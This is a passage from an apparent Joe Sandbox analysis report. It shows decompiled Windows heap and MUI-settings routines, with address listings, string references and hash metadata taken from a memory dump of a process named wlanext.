							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E034EB150();
				} else {
					E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E034EB150("Error code: %d - %s\n",  *0x35d5898);
				_t113 =  *0x35d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E034EB150();
					} else {
						E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E034EB150("Parameter1: %p\n",  *0x35d58a4);
				}
				_t115 =  *0x35d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E034EB150();
					} else {
						E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E034EB150("Parameter2: %p\n",  *0x35d58a8);
				}
				_t117 =  *0x35d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E034EB150();
					} else {
						E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E034EB150("Parameter3: %p\n",  *0x35d58ac);
				}
				_t119 =  *0x35d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E034EB150();
					} else {
						E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x35d58b4);
					E034EB150("Last known valid blocks: before - %p, after - %p\n",  *0x35d58b0);
				} else {
					_t120 =  *0x35d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E034EB150();
				} else {
					E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E034EB150("Stack trace available at %p\n", 0x35d58c0);
			}











                                  0x035a1c10
                                  0x035a1c16
                                  0x035a1c1e
                                  0x035a1c3d
                                  0x035a1c3e
                                  0x035a1c20
                                  0x035a1c35
                                  0x035a1c3a
                                  0x035a1c44
                                  0x035a1c55
                                  0x035a1c5a
                                  0x035a1c65
                                  0x035a1c67
                                  0x00000000
                                  0x035a1c6e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035a1c67
                                  0x035a1cdc
                                  0x035a1ce5
                                  0x035a1d04
                                  0x035a1d05
                                  0x035a1ce7
                                  0x035a1cfc
                                  0x035a1d01
                                  0x035a1d0b
                                  0x035a1d17
                                  0x035a1d1f
                                  0x035a1d25
                                  0x035a1d30
                                  0x035a1d4f
                                  0x035a1d50
                                  0x035a1d32
                                  0x035a1d47
                                  0x035a1d4c
                                  0x035a1d61
                                  0x035a1d67
                                  0x035a1d68
                                  0x035a1d6e
                                  0x035a1d79
                                  0x035a1d98
                                  0x035a1d99
                                  0x035a1d7b
                                  0x035a1d90
                                  0x035a1d95
                                  0x035a1daa
                                  0x035a1db0
                                  0x035a1db1
                                  0x035a1db7
                                  0x035a1dc2
                                  0x035a1de1
                                  0x035a1de2
                                  0x035a1dc4
                                  0x035a1dd9
                                  0x035a1dde
                                  0x035a1df3
                                  0x035a1df9
                                  0x035a1dfa
                                  0x035a1e00
                                  0x035a1e0a
                                  0x035a1e13
                                  0x035a1e32
                                  0x035a1e33
                                  0x035a1e15
                                  0x035a1e2a
                                  0x035a1e2f
                                  0x035a1e39
                                  0x035a1e4a
                                  0x035a1e02
                                  0x035a1e02
                                  0x035a1e08
                                  0x00000000
                                  0x00000000
                                  0x035a1e08
                                  0x035a1e5b
                                  0x035a1e7a
                                  0x035a1e7b
                                  0x035a1e5d
                                  0x035a1e72
                                  0x035a1e77
                                  0x035a1e95

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                  • API String ID: 0-2897834094
                                  • Opcode ID: 6ebca1ca1b252207a24edbd4eed69e9dce1cb1c73b2b16d7277b4db70bec74b4
                                  • Instruction ID: 496e9cebc560b0473be829a2e3c78aaa0c0ace07301da341a9e687a44e348421
                                  • Opcode Fuzzy Hash: 6ebca1ca1b252207a24edbd4eed69e9dce1cb1c73b2b16d7277b4db70bec74b4
                                  • Instruction Fuzzy Hash: 5A61F73A916E45DFC211E789E4A6D28B3A4F7049B1F1DC42FF40A5F231D7349981AA1E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034F3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E034F3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E034F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E034F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E034F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E034F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E034F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03504620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0352F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03531370(_t276, 0x34c4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0352BB40(0,  &_v68, _t170);
									if(L034F43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0352BB40(_t257,  &_v68, _t243);
								if(L034F43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03531370(_t278, 0x34c4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03504620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0352F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03531370(_v16, 0x34c4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0352BB40(_t262,  &_v68, _t244);
								if(L034F43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03531370(_t282, 0x34c4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0352BB40(_t262,  &_v68, _t201);
							if(L034F43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03504620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0352F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03531370(_t280, 0x34c4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0352BB40(_t267,  &_v68, _t245);
							if(L034F43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03531370(_t284, 0x34c4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0352BB40(_t267,  &_v68, _t224);
						if(L034F43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                  0x034f3d3c
                                  0x034f3d42
                                  0x034f3d44
                                  0x034f3d46
                                  0x034f3d49
                                  0x034f3d4c
                                  0x034f3d4f
                                  0x034f3d52
                                  0x034f3d55
                                  0x034f3d58
                                  0x034f3d5b
                                  0x034f3d5f
                                  0x034f3d61
                                  0x034f3d66
                                  0x03548213
                                  0x03548218
                                  0x034f4085
                                  0x034f4088
                                  0x034f408e
                                  0x034f4094
                                  0x034f409a
                                  0x034f40a0
                                  0x034f40a6
                                  0x034f40a9
                                  0x034f40af
                                  0x034f40b6
                                  0x034f40bd
                                  0x034f40bd
                                  0x034f3d83
                                  0x0354821f
                                  0x03548229
                                  0x03548238
                                  0x03548238
                                  0x0354823d
                                  0x0354823d
                                  0x034f3da0
                                  0x034f3daf
                                  0x034f3db5
                                  0x034f3dba
                                  0x034f3dba
                                  0x034f3dd4
                                  0x034f3e94
                                  0x034f3eab
                                  0x034f3f6d
                                  0x034f3f84
                                  0x034f406b
                                  0x034f406b
                                  0x034f406e
                                  0x034f406e
                                  0x034f4070
                                  0x034f4074
                                  0x03548351
                                  0x03548351
                                  0x034f407a
                                  0x034f407f
                                  0x0354835d
                                  0x03548370
                                  0x03548377
                                  0x03548379
                                  0x0354837c
                                  0x0354837c
                                  0x0354835d
                                  0x00000000
                                  0x034f407f
                                  0x034f3f8a
                                  0x034f3f8d
                                  0x034f3f90
                                  0x034f3f95
                                  0x0354830d
                                  0x0354830f
                                  0x034f3f9b
                                  0x034f3fac
                                  0x034f3fae
                                  0x034f3fb1
                                  0x034f3fb1
                                  0x034f3fb6
                                  0x03548317
                                  0x0354831a
                                  0x00000000
                                  0x034f3fbc
                                  0x034f3fc1
                                  0x034f3fc9
                                  0x034f3fd7
                                  0x034f3fda
                                  0x034f3fdd
                                  0x034f4021
                                  0x034f4021
                                  0x034f4029
                                  0x034f4030
                                  0x034f4044
                                  0x034f4046
                                  0x034f4046
                                  0x034f4044
                                  0x034f4049
                                  0x03548327
                                  0x03548334
                                  0x03548339
                                  0x0354833c
                                  0x034f404f
                                  0x034f404f
                                  0x034f404f
                                  0x034f4051
                                  0x034f4056
                                  0x034f4063
                                  0x034f4063
                                  0x034f4068
                                  0x00000000
                                  0x034f4068
                                  0x034f3fdf
                                  0x034f3fe2
                                  0x034f3fe4
                                  0x034f3fe7
                                  0x034f3fef
                                  0x034f4003
                                  0x034f4005
                                  0x034f4005
                                  0x034f400c
                                  0x034f4013
                                  0x034f4016
                                  0x034f4017
                                  0x034f401b
                                  0x034f401e
                                  0x00000000
                                  0x034f401e
                                  0x034f3fb6
                                  0x034f3eb1
                                  0x034f3eb4
                                  0x034f3eb7
                                  0x034f3ebc
                                  0x035482a9
                                  0x035482ab
                                  0x034f3ec2
                                  0x034f3ed3
                                  0x034f3ed5
                                  0x034f3ed8
                                  0x034f3ed8
                                  0x034f3edd
                                  0x035482b3
                                  0x035482b6
                                  0x00000000
                                  0x034f3ee3
                                  0x034f3ee8
                                  0x034f3eed
                                  0x034f3ef0
                                  0x034f3ef3
                                  0x034f3f02
                                  0x034f3f05
                                  0x034f3f08
                                  0x035482c0
                                  0x035482c3
                                  0x035482c5
                                  0x035482c8
                                  0x035482d0
                                  0x035482e4
                                  0x035482e6
                                  0x035482e6
                                  0x035482ed
                                  0x035482f4
                                  0x035482f7
                                  0x035482f8
                                  0x035482fc
                                  0x035482ff
                                  0x035482ff
                                  0x034f3f0e
                                  0x034f3f11
                                  0x034f3f16
                                  0x034f3f1d
                                  0x034f3f31
                                  0x03548307
                                  0x03548307
                                  0x034f3f31
                                  0x034f3f39
                                  0x034f3f48
                                  0x034f3f4d
                                  0x034f3f50
                                  0x034f3f50
                                  0x034f3f53
                                  0x034f3f58
                                  0x034f3f65
                                  0x034f3f65
                                  0x034f3f6a
                                  0x00000000
                                  0x034f3f6a
                                  0x034f3edd
                                  0x034f3dda
                                  0x034f3ddd
                                  0x034f3de0
                                  0x034f3de5
                                  0x03548245
                                  0x034f3deb
                                  0x034f3df7
                                  0x034f3dfc
                                  0x034f3dfe
                                  0x034f3e01
                                  0x034f3e01
                                  0x034f3e06
                                  0x0354824d
                                  0x0354824f
                                  0x03548254
                                  0x00000000
                                  0x034f3e0c
                                  0x034f3e11
                                  0x034f3e16
                                  0x034f3e19
                                  0x034f3e29
                                  0x034f3e2c
                                  0x034f3e2f
                                  0x0354825c
                                  0x0354825f
                                  0x03548261
                                  0x03548264
                                  0x0354826c
                                  0x03548280
                                  0x03548282
                                  0x03548282
                                  0x03548289
                                  0x03548290
                                  0x03548293
                                  0x03548294
                                  0x03548298
                                  0x0354829b
                                  0x0354829b
                                  0x034f3e35
                                  0x034f3e38
                                  0x034f3e3d
                                  0x034f3e44
                                  0x034f3e58
                                  0x035482a3
                                  0x035482a3
                                  0x034f3e58
                                  0x034f3e60
                                  0x034f3e6f
                                  0x034f3e74
                                  0x034f3e77
                                  0x034f3e77
                                  0x034f3e7a
                                  0x034f3e7f
                                  0x034f3e8c
                                  0x034f3e8c
                                  0x034f3e91
                                  0x00000000
                                  0x034f3e91

                                  Strings
                                  • Kernel-MUI-Number-Allowed, xrefs: 034F3D8C
                                  • Kernel-MUI-Language-Disallowed, xrefs: 034F3E97
                                  • Kernel-MUI-Language-Allowed, xrefs: 034F3DC0
                                  • WindowsExcludedProcs, xrefs: 034F3D6F
                                  • Kernel-MUI-Language-SKU, xrefs: 034F3F70
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-258546922
                                  • Opcode ID: 05a0dc110101af36812520b47462fbddfd9fc12a2434afc03798d9784d5c3642
                                  • Instruction ID: 248d703211787f78f9d561ac2272b7e035af8803af3cc9f08f44f559844761d5
                                  • Opcode Fuzzy Hash: 05a0dc110101af36812520b47462fbddfd9fc12a2434afc03798d9784d5c3642
                                  • Instruction Fuzzy Hash: 29F14D76D00619EFCB15DF99D980AEFBBB9FF48650F18005AE505AB360E7319E01CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 29%
                                  			E034E40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E034EB150();
					} else {
						E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E034EB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E034EB150(", passed to %s", _t29);
					}
					_push("\n");
					E034EB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x35d6378 = 1;
						asm("int3");
						 *0x35d6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                  0x034e40e6
                                  0x034e40e8
                                  0x034e40f1
                                  0x0354042d
                                  0x0354044c
                                  0x03540451
                                  0x0354042f
                                  0x03540444
                                  0x03540449
                                  0x0354045d
                                  0x03540466
                                  0x0354046e
                                  0x03540474
                                  0x03540475
                                  0x0354047a
                                  0x0354048a
                                  0x0354048c
                                  0x03540493
                                  0x03540494
                                  0x03540494
                                  0x00000000
                                  0x0354049b
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                  • API String ID: 0-188067316
                                  • Opcode ID: bff762dbe0ec2861b7c3e2cc1fb9881a5f3e8faa75a499a9118f717afcfc5454
                                  • Instruction ID: 692a1c6cfa4f08ab429f76e0920481fad86b209711b83ace41b3653a63147b52
                                  • Opcode Fuzzy Hash: bff762dbe0ec2861b7c3e2cc1fb9881a5f3e8faa75a499a9118f717afcfc5454
                                  • Instruction Fuzzy Hash: 0C01683E616280AED228D765B40DF56F7A4EB01B71F3DC02FF0090F6928AA89440C129
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0350A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E0350A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0350DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E03529730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E035AA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E03529660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E034EB150();
					} else {
						E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E034EB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E03507D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E035A138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E03507D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E03507D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E035A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E03507D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E03507D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E035A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0353D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                  0x0350a229
                                  0x0350a231
                                  0x0350a23f
                                  0x0350a242
                                  0x0350a244
                                  0x0350a24c
                                  0x0350a255
                                  0x0350a25a
                                  0x0350a25f
                                  0x03551c76
                                  0x03551c78
                                  0x03551c7e
                                  0x03551c7f
                                  0x03551c81
                                  0x03551c82
                                  0x03551c84
                                  0x03551c89
                                  0x03551c8b
                                  0x03551c9e
                                  0x03551c9e
                                  0x03551cab
                                  0x03551cb2
                                  0x00000000
                                  0x03551cb2
                                  0x03551c8d
                                  0x03551c92
                                  0x00000000
                                  0x00000000
                                  0x03551c94
                                  0x03551c98
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03551c98
                                  0x0350a265
                                  0x0350a265
                                  0x0350a266
                                  0x0350a26f
                                  0x0350a270
                                  0x0350a276
                                  0x0350a277
                                  0x0350a279
                                  0x0350a27e
                                  0x0350a282
                                  0x03551db5
                                  0x03551dbb
                                  0x03551dc1
                                  0x03551dc5
                                  0x03551de4
                                  0x03551de9
                                  0x03551dc7
                                  0x03551ddc
                                  0x03551de1
                                  0x03551def
                                  0x03551df3
                                  0x03551df7
                                  0x03551dfe
                                  0x03551e06
                                  0x0350a302
                                  0x0350a308
                                  0x0350a308
                                  0x0350a288
